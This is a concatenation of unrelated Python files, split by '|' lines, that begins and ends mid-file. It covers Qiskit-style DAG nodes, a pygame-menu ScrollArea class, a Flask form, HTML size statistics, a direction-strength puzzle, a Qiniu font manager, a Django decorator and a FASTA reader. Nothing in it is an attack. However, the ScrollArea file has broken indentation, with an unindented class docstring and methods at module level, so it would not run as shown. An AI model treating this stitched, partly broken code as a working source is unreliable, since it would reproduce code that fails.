                and node1.op == node2.op
            )
        if (isinstance(node1, DAGInNode) and isinstance(node2, DAGInNode)) or (
            isinstance(node1, DAGOutNode) and isinstance(node2, DAGOutNode)
        ):
            # Wire nodes match when they refer to the same mapped bit.
            return bit_indices1.get(node1.wire, None) == bit_indices2.get(node2.wire, None)
        return False
class DAGOpNode(DAGNode):
    """Object to represent an Instruction at a node in the DAGCircuit."""

    __slots__ = ["op", "qargs", "cargs", "sort_key"]

    def __init__(self, op, qargs: Iterable[Qubit] = (), cargs: Iterable[Clbit] = ()):
        """Create a node wrapping *op* applied to the given quantum/classical bits."""
        super().__init__()
        self.op = op
        self.qargs = tuple(qargs)
        self.cargs = tuple(cargs)
        # stable key for dagcircuit.topological_nodes ordering
        self.sort_key = str(self.qargs)

    @property
    def name(self):
        """The name of the wrapped Instruction."""
        return self.op.name

    @name.setter
    def name(self, new_name):
        """Rename the wrapped Instruction."""
        self.op.name = new_name

    def __repr__(self):
        """Debug representation showing the op and its bit arguments."""
        return f"DAGOpNode(op={self.op}, qargs={self.qargs}, cargs={self.cargs})"
class DAGInNode(DAGNode):
    """Object to represent an incoming wire node in the DAGCircuit."""

    __slots__ = ["wire", "sort_key"]

    def __init__(self, wire):
        """Create an incoming node attached to *wire*."""
        super().__init__()
        self.wire = wire
        # TODO sort_key which is used in dagcircuit.topological_nodes
        # only works as str([]) for DAGInNodes. Need to figure out why.
        self.sort_key = "[]"

    def __repr__(self):
        """Debug representation showing the attached wire."""
        return f"DAGInNode(wire={self.wire})"
class DAGOutNode(DAGNode):
    """Object to represent an outgoing wire node in the DAGCircuit."""

    __slots__ = ["wire", "sort_key"]

    def __init__(self, wire):
        """Create an outgoing node attached to *wire*."""
        super().__init__()
        self.wire = wire
        # TODO sort_key which is used in dagcircuit.topological_nodes
        # only works as str([]) for DAGOutNodes. Need to figure out why.
        self.sort_key = "[]"

    def __repr__(self):
        """Debug representation showing the attached wire."""
        return f"DAGOutNode(wire={self.wire})"
|
# coding=utf-8
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
SCROLLAREA
ScrollArea class to manage scrolling in menu.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2020 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
import pygame
import pygame_menu.baseimage as _baseimage
import pygame_menu.locals as _locals
from pygame_menu.utils import make_surface, assert_color, assert_position
from pygame_menu.widgets import ScrollBar
class ScrollArea(object):
"""
The ScrollArea class provides a scrolling view managing up to 4 scroll bars.
A scroll area is used to display the contents of a child surface (``world``).
If the surface exceeds the size of the drawing surface, the view provide
scroll bars so that the entire area of the child surface can be viewed.
:param area_width: Width of scrollable area (px)
:type area_width: int, float
:param area_height: Height of scrollable area (px)
:type area_height: int, float
:param area_color: Background color, it can be a color or an image
:type area_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`, None
    :param extend_x: Px to extend the surface in x axis (px) from left
:type extend_x: int, float
:param extend_y: Px to extend the surface in y axis (px) from top
:type extend_y: int, float
:param scrollbar_color: Scrollbars color
:type scrollbar_color: tuple, list
:param scrollbar_slider_color: Color of the sliders
:type scrollbar_slider_color: tuple, list
:param scrollbar_slider_pad: Space between slider and scrollbars borders
:type scrollbar_slider_pad: int, float
:param scrollbar_thick: Scrollbars thickness
:type scrollbar_thick: int, float
:param scrollbars: Positions of the scrollbars
:type scrollbars: tuple, list
:param shadow: Indicate if a shadow is drawn on each scrollbar
:type shadow: bool
:param shadow_color: Color of the shadow
:type shadow_color: tuple, list
:param shadow_offset: Offset of shadow
:type shadow_offset: int, float
:param shadow_position: Position of shadow
:type shadow_position: str
:param world: Surface to draw and scroll
:type world: :py:class:`pygame.Surface`, None
"""
    def __init__(self,
                 area_width,
                 area_height,
                 area_color=None,
                 extend_x=0,
                 extend_y=0,
                 scrollbar_color=(235, 235, 235),
                 scrollbar_slider_color=(200, 200, 200),
                 scrollbar_slider_pad=0,
                 scrollbar_thick=20,
                 scrollbars=(_locals.POSITION_SOUTH, _locals.POSITION_EAST),
                 shadow=False,
                 shadow_color=(0, 0, 0),
                 shadow_offset=2,
                 shadow_position=_locals.POSITION_SOUTHEAST,
                 world=None,
                 ):
        # Parameters are documented in the class docstring above.
        assert isinstance(area_width, (int, float))
        assert isinstance(area_height, (int, float))
        assert isinstance(scrollbar_slider_pad, (int, float))
        assert isinstance(scrollbar_thick, (int, float))
        assert isinstance(shadow, bool)
        assert isinstance(shadow_offset, (int, float))
        assert_color(scrollbar_color)
        assert_color(scrollbar_slider_color)
        assert_color(shadow_color)
        assert_position(shadow_position)

        assert area_width > 0 and area_height > 0, \
            'area size must be greater than zero'

        self._rect = pygame.Rect(0.0, 0.0, area_width, area_height)
        self._world = world  # type: pygame.Surface
        self._scrollbars = []
        # NOTE(review): set() does not preserve order, so the mapping between
        # positions and the scrollbars created below is order-dependent on the
        # deduplicated tuple -- confirm duplicates are never passed in.
        self._scrollbar_positions = tuple(set(scrollbars))  # Ensure unique
        self._scrollbar_thick = scrollbar_thick
        self._bg_surface = None

        self._extend_x = extend_x
        self._extend_y = extend_y

        if area_color:
            # Pre-render the (possibly extended) background once.
            self._bg_surface = make_surface(width=area_width + extend_x,
                                            height=area_height + self._extend_y)
            if isinstance(area_color, _baseimage.BaseImage):
                area_color.draw(surface=self._bg_surface, area=self._bg_surface.get_rect())
            else:
                self._bg_surface.fill(area_color)

        self._view_rect = self.get_view_rect()

        # Create one ScrollBar per requested position; vertical bars for
        # east/west, horizontal otherwise.
        for pos in self._scrollbar_positions:  # type:str
            assert_position(pos)
            if pos == _locals.POSITION_EAST or pos == _locals.POSITION_WEST:
                sbar = ScrollBar(self._view_rect.height, (0, max(1, self.get_hidden_height())),
                                 orientation=_locals.ORIENTATION_VERTICAL,
                                 slider_pad=scrollbar_slider_pad,
                                 slider_color=scrollbar_slider_color,
                                 page_ctrl_thick=scrollbar_thick,
                                 page_ctrl_color=scrollbar_color,
                                 onchange=self._on_vertical_scroll)
            else:
                sbar = ScrollBar(self._view_rect.width, (0, max(1, self.get_hidden_width())),
                                 slider_pad=scrollbar_slider_pad,
                                 slider_color=scrollbar_slider_color,
                                 page_ctrl_thick=scrollbar_thick,
                                 page_ctrl_color=scrollbar_color,
                                 onchange=self._on_horizontal_scroll)
            sbar.set_shadow(enabled=shadow,
                            color=shadow_color,
                            position=shadow_position,
                            offset=shadow_offset)
            sbar.set_controls(joystick=False)

            self._scrollbars.append(sbar)

        self._apply_size_changes()
def _apply_size_changes(self):
"""
Apply size changes to scrollbar.
:return: None
"""
self._view_rect = self.get_view_rect()
for sbar in self._scrollbars:
pos = self._scrollbar_positions[self._scrollbars.index(sbar)]
if pos == _locals.POSITION_WEST:
sbar.set_position(self._view_rect.left - self._scrollbar_thick, self._view_rect.top)
elif pos == _locals.POSITION_EAST:
sbar.set_position(self._view_rect.right, self._view_rect.top)
elif pos == _locals.POSITION_NORTH:
sbar.set_position(self._view_rect.left, self._view_rect.top - self._scrollbar_thick)
else:
sbar.set_position(self._view_rect.left, self._view_rect.bottom)
if pos in (_locals.POSITION_NORTH, _locals.POSITION_SOUTH) \
and self.get_hidden_width() != sbar.get_maximum() \
and self.get_hidden_width() != 0:
sbar.set_length(self._view_rect.width)
sbar.set_maximum(self.get_hidden_width())
sbar.set_page_step(self._view_rect.width * self.get_hidden_width() /
(self._view_rect.width + self.get_hidden_width()))
elif pos in (_locals.POSITION_EAST, _locals.POSITION_WEST) \
and self.get_hidden_height() != sbar.get_maximum() \
and self.get_hidden_height() != 0:
sbar.set_length(self._view_rect.height)
sbar.set_maximum(self.get_hidden_height())
sbar.set_page_step(self._view_rect.height * self.get_hidden_height() /
(self._view_rect.height + self.get_hidden_height()))
def draw(self, surface):
"""
Called by end user to draw state to the surface.
:param surface: Surface to render the area
:type surface: :py:class:`pygame.Surface`
:return: None
"""
if not self._world:
return
if self._bg_surface:
surface.blit(self._bg_surface, (self._rect.x - self._extend_x, self._rect.y - self._extend_y))
offsets = self.get_offsets()
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL:
if self.get_hidden_width():
sbar.draw(surface) # Display scrollbar
else:
if self.get_hidden_height():
sbar.draw(surface) # Display scrollbar
surface.blit(self._world, self._view_rect.topleft, (offsets, self._view_rect.size))
def get_hidden_width(self):
"""
Return the total width out of the bounds of the the viewable area.
Zero is returned if the world width is lower than the viewable area.
:return: None
"""
if not self._world:
return 0
return max(0, self._world.get_width() - self._view_rect.width)
def get_hidden_height(self):
"""
Return the total height out of the bounds of the the viewable area.
Zero is returned if the world height is lower than the viewable area.
:return: None
"""
if not self._world:
return 0
return max(0, self._world.get_height() - self._view_rect.height)
def get_offsets(self):
"""
Return the offset introduced by the scrollbars in the world.
:return: None
"""
offsets = [0, 0]
for sbar in self._scrollbars: # type: ScrollBar
if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL:
if self.get_hidden_width():
offsets[0] = sbar.get_value()
else:
if self.get_hidden_height():
offsets[1] = sbar.get_value()
return offsets
def get_rect(self):
"""
Return the Rect object.
:return: Pygame.Rect object
:rtype: :py:class:`pygame.Rect`
"""
return self._rect.copy()
def get_scrollbar_thickness(self, orientation):
"""
Return the scroll thickness of the area. If it's hidden return zero.
:param orientation: Orientation of the scroll
:type orientation: str
:return: Thickness in px
:rtype: int
"""
if orientation == _locals.ORIENTATION_HORIZONTAL:
return self._rect.height - self._view_rect.height
elif orientation == _locals.ORIENTATION_VERTICAL:
return self._rect.width - self._view_rect.width
return 0
def get_view_rect(self):
    """
    Subtract width of scrollbars from area with the given size and return
    the viewable area.

    The viewable area depends on the world size, because scroll bars may
    or may not be displayed.

    :return: Viewable area rect
    :rtype: :py:class:`pygame.Rect`
    """
    rect = pygame.Rect(self._rect)

    # No scrollbar: area is large enough to display world
    if not self._world or (self._world.get_width() <= self._rect.width
                           and self._world.get_height() <= self._rect.height):
        return rect

    # All scrollbars: the world is too large in both dimensions, so shrink
    # the view by every configured scrollbar position.
    if self._world.get_height() > self._rect.height \
            and self._world.get_width() > self._rect.width:
        if _locals.POSITION_WEST in self._scrollbar_positions:
            rect.left += self._scrollbar_thick
            rect.width -= self._scrollbar_thick
        if _locals.POSITION_EAST in self._scrollbar_positions:
            rect.width -= self._scrollbar_thick
        if _locals.POSITION_NORTH in self._scrollbar_positions:
            rect.top += self._scrollbar_thick
            rect.height -= self._scrollbar_thick
        if _locals.POSITION_SOUTH in self._scrollbar_positions:
            rect.height -= self._scrollbar_thick
        return rect

    # Calculate the maximum variations introduced by the scrollbars
    bars_total_width = 0
    bars_total_height = 0
    if _locals.POSITION_NORTH in self._scrollbar_positions:
        bars_total_height += self._scrollbar_thick
    if _locals.POSITION_SOUTH in self._scrollbar_positions:
        bars_total_height += self._scrollbar_thick
    if _locals.POSITION_WEST in self._scrollbar_positions:
        bars_total_width += self._scrollbar_thick
    if _locals.POSITION_EAST in self._scrollbar_positions:
        bars_total_width += self._scrollbar_thick

    # World taller than the view: vertical bars consume horizontal space,
    # which may in turn force horizontal bars to appear.
    if self._world.get_height() > self._rect.height:
        if _locals.POSITION_WEST in self._scrollbar_positions:
            rect.left += self._scrollbar_thick
            rect.width -= self._scrollbar_thick
        if _locals.POSITION_EAST in self._scrollbar_positions:
            rect.width -= self._scrollbar_thick
        if self._world.get_width() > self._rect.width - bars_total_width:
            if _locals.POSITION_NORTH in self._scrollbar_positions:
                rect.top += self._scrollbar_thick
                rect.height -= self._scrollbar_thick
            if _locals.POSITION_SOUTH in self._scrollbar_positions:
                rect.height -= self._scrollbar_thick

    # World wider than the view: horizontal bars consume vertical space,
    # which may in turn force vertical bars to appear.
    if self._world.get_width() > self._rect.width:
        if _locals.POSITION_NORTH in self._scrollbar_positions:
            rect.top += self._scrollbar_thick
            rect.height -= self._scrollbar_thick
        if _locals.POSITION_SOUTH in self._scrollbar_positions:
            rect.height -= self._scrollbar_thick
        if self._world.get_height() > self._rect.height - bars_total_height:
            if _locals.POSITION_WEST in self._scrollbar_positions:
                rect.left += self._scrollbar_thick
                rect.width -= self._scrollbar_thick
            if _locals.POSITION_EAST in self._scrollbar_positions:
                rect.width -= self._scrollbar_thick

    return rect
def get_world_size(self):
    """
    Return the size of the world surface.

    :return: (width, height) in pixels; (0, 0) when no world is set
    :rtype: tuple
    """
    world = self._world
    if world is None:
        return 0, 0
    return world.get_width(), world.get_height()
def _on_horizontal_scroll(self, value):
    """
    Called when a horizontal scrollbar changes, to propagate the new
    position to the opposite horizontal bar if one exists.

    :param value: New position of the slider
    :type value: float
    :return: None
    """
    for bar in self._scrollbars:  # type: ScrollBar
        if bar.get_orientation() != _locals.ORIENTATION_HORIZONTAL:
            continue
        # Only sync when there is hidden width and the bar is out of date.
        if self.get_hidden_width() != 0 and bar.get_value() != value:
            bar.set_value(value)
def _on_vertical_scroll(self, value):
    """
    Called when a vertical scrollbar changes, to propagate the new
    position to the opposite vertical bar if one exists.

    :param value: New position of the slider
    :type value: float
    :return: None
    """
    for bar in self._scrollbars:  # type: ScrollBar
        if bar.get_orientation() != _locals.ORIENTATION_VERTICAL:
            continue
        # Only sync when there is hidden height and the bar is out of date.
        if self.get_hidden_height() != 0 and bar.get_value() != value:
            bar.set_value(value)
def scroll_to_rect(self, rect, margin=10.0):
    """
    Ensure that the given rect is in the viewable area.

    :param rect: Rect in the world surface reference
    :type rect: :py:class:`pygame.Rect`
    :param margin: Extra margin around the rect
    :type margin: int, float
    :return: None
    """
    assert isinstance(margin, (int, float))
    real_rect = self.to_real_position(rect)
    # Already strictly inside the viewable area: nothing to scroll.
    if self._view_rect.topleft[0] < real_rect.topleft[0] \
            and self._view_rect.topleft[1] < real_rect.topleft[1] \
            and self._view_rect.bottomright[0] > real_rect.bottomright[0] \
            and self._view_rect.bottomright[1] > real_rect.bottomright[1]:
        return  # rect is in viewable area
    for sbar in self._scrollbars:  # type: ScrollBar
        if sbar.get_orientation() == _locals.ORIENTATION_HORIZONTAL and self.get_hidden_width():
            # Smallest displacement (by absolute value) that brings either
            # edge plus margin into view, clamped to the scrollbar range.
            shortest_move = min(real_rect.left - margin - self._view_rect.left,
                                real_rect.right + margin - self._view_rect.right, key=abs)
            value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)
            value = max(sbar.get_minimum(), value)
            sbar.set_value(value)
        if sbar.get_orientation() == _locals.ORIENTATION_VERTICAL and self.get_hidden_height():
            shortest_move = min(real_rect.bottom + margin - self._view_rect.bottom,
                                real_rect.top - margin - self._view_rect.top, key=abs)
            value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)
            value = max(sbar.get_minimum(), value)
            sbar.set_value(value)
def set_position(self, posx, posy):
    """
    Move the scroll area to a new position and re-apply the layout.

    :param posx: X position
    :type posx: int, float
    :param posy: Y position
    :type posy: int, float
    :return: None
    """
    self._rect.x, self._rect.y = posx, posy
    self._apply_size_changes()
def set_world(self, surface):
    """
    Update the scrolled surface.

    :param surface: New world surface
    :type surface: :py:class:`pygame.Surface`
    :return: None
    """
    self._world = surface
    # Re-layout, since the new world size may change which scrollbars show.
    self._apply_size_changes()
def to_real_position(self, virtual, visible=False):
    """
    Translate a position/Rect expressed in world-surface coordinates into
    real coordinates relative to the scroll area origin.

    :param virtual: Position/Rect in the world surface reference
    :type virtual: :py:class:`pygame.Rect`, tuple, list
    :param visible: If a rect is given, return only the visible width/height
    :type visible: bool
    :return: real rect or real position
    :rtype: :py:class:`pygame.Rect`, tuple
    """
    assert isinstance(virtual, (pygame.Rect, tuple, list))
    off_x, off_y = self.get_offsets()
    if isinstance(virtual, pygame.Rect):
        real = pygame.Rect(virtual)
        real.x = self._rect.x + virtual.x - off_x
        real.y = self._rect.y + virtual.y - off_y
        # Clip to the viewable area when only the visible part is wanted.
        return self._view_rect.clip(real) if visible else real
    return self._rect.x + virtual[0] - off_x, self._rect.y + virtual[1] - off_y
def to_world_position(self, real):
    """
    Translate a real position/Rect (relative to the scroll area origin)
    back into world-surface coordinates.

    :param real: Position/Rect according scroll area origin
    :type real: :py:class:`pygame.Rect`, tuple, list
    :return: rect in world or position in world
    :rtype: :py:class:`pygame.Rect`, tuple
    """
    assert isinstance(real, (pygame.Rect, tuple, list))
    off_x, off_y = self.get_offsets()
    if isinstance(real, pygame.Rect):
        world = pygame.Rect(real)
        world.x = real.x - self._rect.x + off_x
        world.y = real.y - self._rect.y + off_y
        return world
    return real[0] - self._rect.x + off_x, real[1] - self._rect.y + off_y
def is_scrolling(self):
    """
    Return whether the user is currently dragging any scrollbar.

    :return: True if at least one scrollbar is scrolling
    :rtype: bool
    """
    return any(bar.scrolling for bar in self._scrollbars)
def update(self, events):
    """
    Called by the end user to update the scroll state.

    :param events: List of pygame events
    :type events: list
    :return: True if any scrollbar consumed an update
    :rtype: bool
    """
    horizontal_done, vertical_done = 0, 0
    for bar in self._scrollbars:  # type: ScrollBar
        # Each orientation is updated at most once per call.
        if bar.get_orientation() == _locals.ORIENTATION_HORIZONTAL and not horizontal_done:
            horizontal_done = bar.update(events)
        elif bar.get_orientation() == _locals.ORIENTATION_VERTICAL and not vertical_done:
            vertical_done = bar.update(events)
    return horizontal_done or vertical_done
|
from flask_wtf import FlaskForm
from wtforms import SubmitField, RadioField, StringField, validators
class ShowRecords(FlaskForm):
    """Form listing stored records with CRUD action buttons."""
    # Radio group with one entry per stored record; submitted value is an int id.
    record_list = RadioField("Список записів: ", coerce=int)
    back = SubmitField('<- Назад')  # navigate back
    delete = SubmitField('Видалити')  # delete the selected record
    add = SubmitField('Додати')  # add a new record
    update = SubmitField('Редагувати')  # edit the selected record
|
import os
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import sys
def density_plot(result_sizes):
    """Show a density plot (histogram + KDE + rug) of HTML file sizes in Kb.

    :param result_sizes: sequence of file sizes in kilobytes (must be non-empty)
    """
    sns.distplot(result_sizes, hist=True, kde=True, rug=True,
                 color='darkblue',
                 kde_kws={'linewidth': 2},
                 rug_kws={'color': 'black'})
    # Plot formatting: hoist the maximum once for both axis limit and ticks.
    upper = max(result_sizes)
    plt.title('Density Plot of the size of html file in Kb')
    plt.xlabel('HTML size, Kb')
    plt.ylabel('Density')
    plt.xlim((0, upper))
    plt.xticks(np.linspace(0, upper, num=11))
    plt.show()
def main():
    """Collect on-disk sizes (Kb) of the html files listed in an input file,
    print summary statistics and optionally plot their density."""
    file_sizes = []
    # reading command line arguments:
    if len(sys.argv) not in (3, 4):
        print("Wrong number of system arguments. To get 0-25 percentile,")
        print("try sth like:")
        print("python3 html_stats_from_file.py ../google-benchmark/test.txt "
              "test-websites plot=False")
        return
    input_file, db_directory = sys.argv[1:3]
    print(input_file, db_directory)
    # recursively walking through all files:
    with open(input_file, 'r') as file:
        # cutting the 'http://10.42.0.1/' from the path:
        for line in file:
            line = line.strip()
            # Advance past the third '/' to strip the scheme+host prefix.
            slash_count, index = 0, 0
            while slash_count < 3 and index != len(line):
                if line[index] == '/':
                    slash_count += 1
                index += 1
            filepath = line[index:]
            print(filepath)
            # opening the file stats, and saving the size of the file to list
            file_stats = os.stat(db_directory + '/' + filepath)
            file_sizes.append(file_stats.st_size / 1024)  # bytes -> Kb
    print(file_sizes)
    # sorting by the file_size
    # file_list.sort(key=lambda x: x[1])
    df_describe = pd.DataFrame(file_sizes)
    print("The following stats, except for count, are in Kilobytes:", df_describe.describe())
    print("Total size of", len(file_sizes), "html files is", sum(file_sizes), "Kb")
    # Plot only when explicitly requested via the last CLI argument.
    # NOTE(review): the usage text above shows "plot=False" but only the
    # literal "plot=True" enables plotting - confirm intended wording.
    if sys.argv[-1] == "plot=True":
        density_plot(file_sizes)
if __name__ == '__main__':
    main()
|
# Reads one space-separated input line describing attacks (day, direction and
# attacking strength tokens) and counts, per direction (N/S/E/W), how many
# attacks set a new strength record.
a=input().split(' ')
s=[]  # record-setting strengths on the South side
w=[]  # record-setting strengths on the West side
n=[]  # record-setting strengths on the North side
e=[]  # record-setting strengths on the East side
k=0  # error flag: set to 1 when the input does not start with day 1
l=[]  # To store the directions.
l1=[]  # To store the attacking strengths (same index as the direction in l).
for i in range(0,len(a)):  # Extract the directions along with their attacking strengths.
    if a[1]=='1$':  # Checks whether the input starts with day 1.
        if a[i]=='W' or a[i]=='E' or a[i]=='N' or a[i]=='S' :
            l.append(a[i])  # Record the direction.
            l1.append(int(a[i+4]))  # Strength token sits 4 positions after its direction.
    else:  # The input does not start with day 1.
        print("Enter from day 1")
        k=1
        break
l2=[]
# First occurrence of each direction is handled separately, because there is
# no previous maximum to compare against yet.
for i in range(0,len(l)):
    if l[i] not in l2:  # Direction seen for the first time.
        if l[i]=='E':
            e.append(l1[i])  # Record the first East strength.
            l2.append(l[i])  # Mark East as seen.
        if l[i]=='W':
            w.append(l1[i])  # Record the first West strength.
            l2.append(l[i])  # Mark West as seen.
        if l[i]=='N':
            n.append(l1[i])  # Record the first North strength.
            l2.append(l[i])  # Mark North as seen.
        if l[i]=='S':
            s.append(l1[i])  # Record the first South strength.
            l2.append(l[i])  # Mark South as seen.
    else:  # Direction seen before: keep only strictly larger strengths.
        if l[i]=='E':  # East side.
            el=sorted(e)
            if el[len(el)-1] < l1[i]:  # Greater than the previous East maximum?
                e.append(l1[i])
        if l[i]=='W':  # West side.
            wl=sorted(w)
            if wl[len(wl)-1] < l1[i]:  # Greater than the previous West maximum?
                w.append(l1[i])
        if l[i]=='N':  # North side.
            nl=sorted(n)
            if nl[len(nl)-1] < l1[i]:  # Greater than the previous North maximum?
                n.append(l1[i])
        if l[i]=='S':  # South side.
            sl=sorted(s)
            if sl[len(sl)-1] < l1[i]:  # Greater than the previous South maximum?
                s.append(l1[i])
# NOTE(review): rebinding 'n' here shadows the North-side list; it only works
# because len(n) is evaluated before the assignment completes.
n=len(e)+len(w)+len(n)+len(s)
if k!=1:  # Print only when the input started with day 1.
    print(n)
|
# !/usr/bin/env python
# coding=utf-8
# author: sunnywalden@gmail.com
import qiniu
import os
import requests
import sys
BASE_DIR = os.path.abspath(os.path.join(os.getcwd(), ".."))
sys.path.append(BASE_DIR)
from utils.get_logger import Log
from conf import config
from utils.fonts_scanner import get_fonts_from_local
class QiniuManager:
    """Manage font files stored in a Qiniu object-storage bucket:
    list, download, upload and batch-delete objects under a configured prefix."""

    def __init__(self):
        log = Log()
        self.logger = log.logger_generate('qiniu_manage')
        # Authenticated qiniu credentials, reused by all bucket operations.
        self.auth = self.get_auth()

    def get_auth(self):
        """Build a qiniu Auth object from the configured access key pair."""
        auth = qiniu.Auth(config.qiniu_accesskeyid, config.qiniu_accesskeysecret)
        return auth

    def print_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
        """Log and print the font names (bucket prefix stripped) matching the filters."""
        fonts_object_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
        fonts_list = list(map(lambda font_object: font_object['key'].split(prefix)[-1], fonts_object_list))
        self.logger.info('Fonts found in qiniu %s' % fonts_list)
        print(fonts_list)

    def get_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
        """Return bucket objects whose key starts with *prefix*, contains
        *keyword*, and whose basename starts with *pref*."""
        bucket = qiniu.BucketManager(self.auth)
        ret, eof, info = bucket.list(config.qiniu_fonts_bucket, prefix)
        fonts_object_list = list(filter(lambda font_info: font_info['key'].startswith(prefix) and keyword in font_info['key'] and ''.join(font_info['key'].split(prefix)[-1]).startswith(pref), ret['items']))
        # fonts_list = list(map(lambda font_info: font_info['key'].split(config.qiniu_fonts_prefix)[1], ret['items']))
        self.logger.info('There was %s fonts matched in qiniu' % len(fonts_object_list))
        print('There was %s fonts matched in qiniu' % len(fonts_object_list))
        # print(fonts_object_list)
        return fonts_object_list

    def download_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
        """Download every matching font into the configured local directory."""
        fonts_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
        for fonts_file in fonts_list:
            # private_url = self.auth.private_download_url(config.qiniu_domain + '/' + pref + fonts_file)
            font_name = fonts_file['key'].split(prefix)[-1]
            font_url = config.qiniu_domain + '/' + fonts_file['key']
            # Signed URL is needed because the bucket is private.
            private_url = self.auth.private_download_url(font_url)
            print('Start to download resourse %s' % font_url)
            self.logger.info('Start to download resourse %s' % font_url)
            res = requests.get(private_url)
            assert res.status_code == 200
            font_file = res.content
            storage_path = os.path.join(BASE_DIR, config.qiniu_download_url)
            # print(storage_path)
            font_path = os.path.join(storage_path, font_name)
            # print(font_path)
            with open(font_path, 'wb') as f:
                f.write(font_file)
            self.logger.info('Fonts %s download success' % fonts_file)

    def upload_fonts(self, prefix=config.qiniu_fonts_prefix):
        """Upload every local font file into the bucket under *prefix*."""
        fonts_list = get_fonts_from_local()
        bucket_name = config.qiniu_fonts_bucket
        for fonts_file in fonts_list:
            font_name = prefix + fonts_file.split('/')[-1]
            # A fresh upload token is required per object key.
            token = self.auth.upload_token(bucket=bucket_name, key=font_name)
            print(font_name)
            print(fonts_file)
            self.logger.info('Start to upload fonts %s' % fonts_file)
            res, info = qiniu.put_file(token, font_name,
                                       fonts_file)
            print(res, info)
            assert info.status_code == 200
            self.logger.info('Fonts %s upload success' % fonts_file)

    def delete_fonts(self, keyword='', pref='', prefix=config.qiniu_fonts_prefix):
        """Batch-delete the fonts matching the filters from the bucket."""
        fonts_list = self.get_fonts(keyword=keyword, pref=pref, prefix=prefix)
        delete_fonts_object = list(
            filter(lambda fonts_file: keyword in fonts_file['key'] and fonts_file['key'].split(prefix)[-1].startswith(pref),
                   fonts_list))
        delete_fonts = list(map(lambda font_object: font_object['key'], delete_fonts_object))
        if not delete_fonts:
            print('No fonts matched for delete in qiniu fonts bucket')
        else:
            print('Fonts to be deleted %s' % delete_fonts)
            self.logger.info('Fonts to be deleted %s' % delete_fonts)
            bucket = qiniu.BucketManager(self.auth)
            ops = qiniu.build_batch_delete(config.qiniu_fonts_bucket, delete_fonts)
            res, info = bucket.batch(ops)
            print(res, info)
            assert info.status_code == 200
            print('Fonts %s delete success' % delete_fonts)
            self.logger.info('Fonts %s delete success' % delete_fonts)
if __name__ == '__main__':
    # NOTE(review): bucket_region and inter_net are never read below -
    # presumably leftovers from an earlier aliyun-based version; confirm.
    bucket_region = 'shanghai'
    # if you are not in a aliyun env, please set it to False
    inter_net = False
    bk_manage = QiniuManager()
    # print all fonts in ali oss font_dir
    bk_manage.print_fonts(keyword='AlibabaSans', pref='AlibabaSans')
    # # download all fonts from to local dir ./downloads/
    # bk_manage.download_fonts(keyword='AlibabaSans', pref='AlibabaSans')
    # upload all fonts in local dir ./fonts/
    # bk_manage.upload_fonts()
    # delete all fonts have keyword
    # bk_manage.delete_fonts(keyword='test', pref='test')
|
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.utils.decorators import available_attrs
from django.contrib import messages
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
default_message = "You must Log In first!"
def user_passes_test(test_func, message=default_message):
    """
    Decorator for views that checks that the user passes the given test,
    setting a message in case of no success. The test should be a callable
    that takes the user object and returns True if the user passes.

    Note: the wrapped view is still executed even when the test fails;
    only the message is queued.
    """
    def decorator(view_func):
        @wraps(view_func, assigned=available_attrs(view_func))
        def _wrapped_view(request, *args, **kwargs):
            if not test_func(request.user):
                # NOTE(review): messages.success() is used for a failure
                # notice - confirm messages.error/info was not intended.
                messages.success(request, message)
            return view_func(request, *args, **kwargs)
        return _wrapped_view
    return decorator
def login_required_message(function=None, message=default_message):
    """
    Decorator for views that checks that the user is logged in, queueing
    a message when the check fails.

    Works both bare (@login_required_message) and with arguments
    (@login_required_message(message=...)).
    """
    decorator = user_passes_test(
        lambda u: u.is_authenticated,
        message=message,
    )
    return decorator(function) if function else decorator
def login_required_message_and_redirect(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None, message=default_message):
    """
    Combine Django's login_required redirect with the message-queueing
    decorator: unauthenticated users get a queued message and are
    redirected to the login page.

    Returns a deferred decorator when called with keyword arguments only
    (i.e. *function* is None).
    """
    if function:
        return login_required_message(
            login_required(function, redirect_field_name, login_url),
            message
        )
    return lambda deferred_function: login_required_message_and_redirect(deferred_function, redirect_field_name, login_url, message)
|
# Reads a FASTA file ('hairpin.fa') and rewrites it to 'test.txt' with each
# multi-line sequence joined onto a single line after its '>' header.
my_file = open('hairpin.fa', 'r')
lines = my_file.readlines()
y = ''
fileText = ""  # accumulated output text
text = []  # sequence fragments of the record currently being read
for line in lines:
    if line.rstrip("\r\n"):  # skip blank lines
        if line.rstrip("\r\n").find(">") == 0:  # FASTA header line
            # Flush the previous record's sequence as one joined line.
            if text:
                fileText = fileText + ''.join(text)
                fileText = fileText + "\n"
